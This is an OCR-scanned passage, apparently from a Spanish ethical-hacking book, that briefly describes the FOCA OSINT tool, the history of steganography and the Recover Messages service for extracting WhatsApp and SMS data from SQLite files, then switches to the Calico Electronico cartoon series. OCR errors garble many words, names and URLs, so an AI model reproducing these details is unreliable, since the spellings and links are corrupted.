seguridad  a  un  sitio  web  o  a  la  red  de  una  empresa,  FOCA  esta  basada  en 
la  recoleccion  de  informacion  de  luenles  abiertas  OSINT,  y  en  esta  ultima 
version  se  ponen  a  disposicion  publica  todos  los  plugins  y  runciones  que 
tenia  la  version  PRO. 

Ademas,  en  esta  version,  es  posible  ampliar  la  luncionalidad  de  la 
hemnienta  y  extender  las  habilidades  de  FOCA  mediante  la  creacion  de 
plugins  personalizados. 


Las  lecnicas  esteganograficas  se  inventaron  hace  miles  de  aiios.  en  la 
antigiia  China  ya  se  empleaban  para  enviar  mensajes  ocullos  entre 
personas.  Posterionnente,  ya  en  la  era  de  la  Guerra  Fria,  vinieron  los 
micropuntos. 

Las  tecnicas  han  ido  evolucionando  hasta  llegar  a  nuestros  dias,  en  los 
que  la  lecnologia  digital  ha  hecho  cambiar  radicalmente  todas  estas 
tecnicas  y  utilizar  los  contenidos  digitales  para  ocullar  los  mensajes. 
La  primera  ocultacion  se  baso  en  el  cambio  del  ultimo  bit,  pero 
rapidamente  sc  desarrollaron  tecnicas  novedosas  que  descubrian  este 
tipo  de  comunicacion.  lo  que  las  inutilizo.  Lo  que  provoco  dedicar 
mas  esJuerzos  a  desarrollar  metodos  que  utilizaran  operaciones  y 
transfomiadas  matematicas  sobre  los  contenidos  digitales  que  se  utilizan 
como  cobertura  de  los  mensajes 


Recover  hdessages 


Recover  Messages 

Recover  hAessages  es  un  servicio  que  permite  examinar  y  recuperar  datos  de  aplicaciones  que  utilizan 
SOLife  como  base  de  datos.  Dichas  aplicaciones  estan  incluidas  en  smartphones  IPhone  y  Android 
principalmente,  ejemplos  de  ello  son  JVhatsApp^  Line,  SpoiBros  etcetera. 

Gracias  a  Recover  Messages  es  posible  inspeccionar  y  recuperar  la  informacion  de  ficheros  SQLite 
facilitados  por  el  usuario,  que  seran  tratados  en  nuestros  sistemas  o  en  los  de  nuestros  proveedores 
de  sistemas  de  fonna  automatica,  y  totalmente  confidencial,  incluyendo  por  supuesto  las  medidas 
de  seguridad  pertinentes. 

Tanto  la  incorporacion  de  ficheros  SQLite  como  la  obtencion  de  los  datos  que  dichos  ficheros 
almacenan,  son  guiados  paso  a  paso  con  asistentes  desde  la  propia  web,  lo  que  hace  muy  sencilla  la 
utilizacion  de  este  servicio  pionero. 

El  servicio  tiene  dos  modal idades: 

-  Gratuito.  En  este  caso  el  usuario  tendra  funcionalidades  limitadas,  siendo  posible 
iinicamente  acceder  a  los  mensajes  WhatsApp  de  los  dispositivos  IPhone  y  Android. 

-  Con  licencia.  En  este  caso  el  usuario  tendra  todas  las  funcionalidades  del  sei'vicio.  que 
incluye  ademas  de  las  incluidas  en  la  modalidad  gratuita,  la  posibilidad  de  recuperar  Mensajes 
SMS  y  Emails  de  IPhone  y  Android,  ademas  de  los  archivos  utilizados  con  otras  aplicaciones 
de  IPhone  como  Tiienfi,  SpotBros  y  Line. 


El  servicio  esta  disponible  en  castellano  y  en  ingles  en  http:! lrecovennessages.com 


tnicio  I  Ayuda  - 


Recover  Messages  es  un  servicio  que  perm'te  ejtaminar  y  recuperar  datos  de  aplicaciones  que  uiiiizan  SQLile  como  base  de  dalos.como  WhalsApp.  Line.  SpoiBros  etc 

Caracteristicas 

WtialsApp  Android  wnatsApp  iPfione  Tuenti  IPhone 

SpoiBros  IPhone  O  Une  iPhone  SMS  Android 

SMS  IPhone  d  EMails  Android  id  EMails  iPhone  d 


_  Accepto  los  icimmo  de  uso 


Procesar 


.  T^rrn«nos  dieUso  |Po«tea(»lhwid((id|Cpn<ado 


Pantalla  principal  de  Recover  Messages. 


Ethical  Hacking:  Teorla  y  practica  para  la  real izac ion  de  nn  pentesting 


238 


Calico  Electronico 

'‘"Calico  Electronico^'  se  ha  convertido  en  la  serie  de  animacion  Flash  mas  famosa  de  Espaha.  En 
clave  de  humor  y  con  una  animacion  de  gran  calidad.  Calico  Electronico  es  un  superheroe  '"aspahoF 
alejado  totalmente  del  patron  establecido  en  los  superheroes:  Calico  es  bajito,  gordo,  y  no  tiene 
ningun  poder.  Lo  que  si  tiene  es  la  fijacion  de  salvar  a  su  ciudad  '^Electronico  CUV'  de  cualquier  mal. 


El  origen  de  ""Calico  Electronico"  fue  una  campaha  de  marketing  de  una  web.  No  obstante,  el  exito 
que  tuvo  supero  todas  las  expectativas  y  se  creo  una  identidad  propia.  ""Calico  Electronico"  ha  hecho 
famoso  a  sii  creador,  Nikodeino,  que  a  partir  de  entonces  creo  un  estudio  de  animacion  llamado 
Nikodemo  Animation.  Tras  los  exitos  iniciales,  la  serie  tuvo  3  temporadas  de  6  capitulos  cada  una. 
incluyendose  en  ellas  unas  tomas  falsas,  al  estilo  dc  las  pcliculas  con  actores  reales.  Ademas  de 
los  capitulos  oflciales  se  hicieron  tambien  capitulos  especiales,  y  una  serie  paralela  llamada  '‘Los 
huerfanos  electronicos”. 


En  la  actual idad  los  fans  de  ^"Calico  Electronico"  pueden  acceder  a  multi tud  de  productos  de  la 
serie,  ya  que  se  han  generado  nuevos  capitulos  y  se  ban  reeditado  los  antiguos  en  alta  calidad,  dichos 
capitulos  estan  disponibles  para  dispositivos  IPhone,  Windows  Phone,  Windows  8  o  Android. 


^CO  elect 
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Aplicacion  de  "Calico  Electronico''  para  Windows  Phone. 


Tambien  ha  aumentado  la  demanda  de  productos  de  Calico,  como  comics,  DVDs  con  los  capitulos 
de  la  serie,  muhecos,  camisetas,  tazas,  barajas  de  cartas  y  un  largo  etcetera. 


Calico  Electronico 


Ejemplos  dc  productos  de  la  tienda  dc  Calico  FJccironico. 


Otra  novedad  son  las  "Tiras  Ccilico",  que  se  corresponden  a  unas  tiras  comicas  de  3  o  4  vihetas,  al 
estilo  de  otros  personajes  conocidos  como  Garfield o  Mafalda.  Dichas  tiras  aparecen  cada  miercoles 
y  tambien  se  pueden  ver  en  los  dispositivos  mencionados.  Ademas  los  fans  tienen  la  posibilidad  de 
enviar  sus  fotos  disfrazados  de  Calico,  o  enviar  sus  propios  dibujos  de  este  peculiar  superheroe. 
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Kjemplo  de  "Tira  Cd/ico'\ 


Para  que  los  fans  e.sten  informados,  se  mantienen  varies  canales  abiertos  sobre  el  prodiiclo: 

-  Twitter:  https://hvittercom/CalicoOficial 

-  Google  Plus:  https://plus.Google.com/] 071 86057 1 2S42296 1 644/posis 

-  1  u en ti :  http ://u  vin i :  tuenti. com/calicoelecti vnico 

-  Youtube:  http'.!l\vww.yonnibe.com/calicoelectronicohd 

F acebook:  https ://\\ 'ww.  facebook. com/CalicoElectronicoOficial 


Ademas  de  todo  esto,  y  para  mantener  vivo  el  proyecto,  se  han  realizado  irabajos  en  el  mundo  de  la 
publicidad,  visitado  una  docena  de  congresos  y  fe.stivales  de  comic,  se  ha  cerrado  la  ilusiracion  de 
un  libro  que  pronto  saldra  a  la  venta  y  se  ha  firmado  un  nuevo  comic  con  Ediciones  Babylon  que 
esta  a  punto  de  ver  la  luz. 

Toda  la  informacion  acerca  de  ""Calico  Electronico"  y  de  los  productos  mencionados  esta  disponible 
en  http'.i lwww.calicoelectronico.com/ 


